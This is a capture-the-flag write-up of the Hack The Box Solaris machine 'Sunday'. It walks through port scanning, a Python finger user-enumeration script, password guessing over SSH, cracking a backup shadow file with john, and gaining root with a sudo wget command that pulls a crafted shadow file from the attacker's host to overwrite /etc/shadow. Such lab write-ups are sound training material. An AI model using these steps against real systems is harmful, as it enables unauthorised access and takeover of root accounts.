Welcome to the Sunday writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k


Sunday

tags: HTB Easy Solaris OSCP
Platform: Hackthebox
Difficult: Easy
S.O.: Solaris

Enumeration

Nmap

To get started, we run a quick open ports scan.

$ nmap -p- -T4 10.10.10.76
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-01 18:14 CEST
Warning: 10.10.10.76 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.76
Host is up (0.094s latency).
Not shown: 61791 closed ports, 3739 filtered ports
PORT      STATE SERVICE
79/tcp    open  finger
111/tcp   open  rpcbind
22022/tcp open  unknown
40259/tcp open  unknown
42990/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 1823.50 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -A -Pn -p 79,111,22022,40259,42990 10.10.10.76
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-01 20:34 CEST
Nmap scan report for 10.10.10.76
Host is up (0.095s latency).

PORT      STATE SERVICE VERSION
79/tcp    open  finger  Sun Solaris fingerd
|_finger: No one logged on\x0D
111/tcp   open  rpcbind 2-4 (RPC #100000)
22022/tcp open  ssh     SunSSH 1.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_  1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
40259/tcp open  unknown
42990/tcp open  rpcbind
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Sun OpenSolaris 2008.11 (94%), Sun Solaris 10 (94%), Sun Solaris 9 or 10, or OpenSolaris 2009.06 snv_111b (94%), Sun Solaris 9 or 10 (SPARC) (92%), Sun Storage 7210 NAS device (92%), Sun Solaris 9 or 10 (92%), Oracle Solaris 11 (91%), Sun Solaris 8 (90%), Sun Solaris 9 (89%), Sun Solaris 8 (SPARC) (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos

TRACEROUTE (using port 111/tcp)
HOP RTT      ADDRESS
1   94.86 ms 10.10.14.1
2   95.01 ms 10.10.10.76

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 81.53 seconds

Finger

We can write a small script to enumerate what users exists in the Finger service on port 79.

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# User enumeration for Solaris Finger by X4v1l0k
import sys, socket, time

if len(sys.argv) != 3:
    print('Run me like: python3 userEnum.py ip wordlist')
    exit(0)

ip = sys.argv[1]
users = open(sys.argv[2], 'r').readlines()

for user in users:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, 79))
        try:
            while 1:
                s.send("{}\n".format(user.strip()))
                response = s.recv(1024).strip()
                if not len(response):
                    s.close()
                    break
                if '???' not in response:
                    print('{}\tuser exists'.format(user.strip()))
        except KeyboardInterrupt:
            s.close()
            exit(0)
        except EOFError:
            s.close()
        s.close()
    except KeyboardInterrupt:
        s.close()
        exit(0)
    except socket.error:
        #Failed to connect to host, waiting 5 seconds to retry...
        time.sleep(5)
        pass

Once written, we just have to run it.

$ python userEnum.py 10.10.10.76 /usr/share/wordlists/rockyou_utf8.txt
access  user exists
nobody  user exists
printer user exists
root    user exists
sammy   user exists
sunny   user exists

Perfect, we already know a few users. Now doing some guessing with the password, we can connect via SSH as sunny using the box name sunday as password.

$ ssh [email protected] -p 22022 -oKexAlgorithms=+diffie-hellman-group1-sha1
Password: 
Last login: Fri Apr  2 14:59:16 2021 from 10.10.14.5
Sun Microsystems Inc.   SunOS 5.11      snv_111b        November 2008
[email protected]:~$ id
uid=65535(sunny) gid=1(other) groups=1(other)

Post exploitation

Privilege escalation 1

Now, inside the system root / we can find a directory called backup with the files agent22.backup and shadow.backup.

[email protected]:/backup$ ls -la 
total 5
drwxr-xr-x  2 root root   4 2018-04-15 20:44 .
drwxr-xr-x 26 root root  28 2021-04-02 12:46 ..
-r-x--x--x  1 root root  53 2018-04-24 10:35 agent22.backup
-rw-r--r--  1 root root 319 2018-04-15 20:44 shadow.backup

Using the file shadow.backup and the file /etc/passwd we can use unshadow to get the password for sammy.

$ unshadow passwd shadow > hash

We can now run john against the hash.

$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cooldude!        (sammy)
1g 0:00:00:23 DONE (2021-04-02 11:36) 0.04253g/s 8711p/s 8711c/s 8711C/s ing456..bluenote
Use the "--show" option to display all of the cracked passwords reliably
Session completed

And now that we have the password cooldude! of sammy we can connect by SSH with the credentials and read the user flag!.

$ ssh [email protected] -p 22022 -oKexAlgorithms=+diffie-hellman-group1-sha1
Password: 
Last login: Fri Jul 31 17:59:59 2020
Sun Microsystems Inc.   SunOS 5.11      snv_111b        November 2008
[email protected]:~$ id
uid=101(sammy) gid=10(staff) groups=10(staff)
[email protected]:~/Desktop$ cat Desktop/user.txt 
CENSORED_FLAG

Privilege escalation 2

[email protected]:~/Desktop$ sudo -l    
User sammy may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/wget

Well, we know that we have a backup of the shadow file, we can add a line for root with the hash of one of the users who know the password sammy or sunny and we will can authenticate as root. Let's serve it with a Python http server.

$ cat shadow
root:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:18462:0:99999:7:::
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

And now, we have to download our shadow file on the machine using sudo wget and the -O parameter to make the downloaded shadow file save by overwriting the original and we can authenticate asroot!.

[email protected]:/backup$ sudo wget 10.10.14.5/shadow -O /etc/shadow                                                     
--22:14:56--  http://10.10.14.5/shadow
           => `/etc/shadow'
Connecting to 10.10.14.5:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 399 [application/octet-stream]

100%[==========================================================================>] 399           --.--K/s             

22:14:56 (62.78 MB/s) - `/etc/shadow' saved [399/399]

[email protected]:/backup$ su root
Password: 
[email protected]:/backup# id
uid=0(root) gid=0(root)
[email protected]:/backup# cat /root/root.txt
CENSORED_FLAG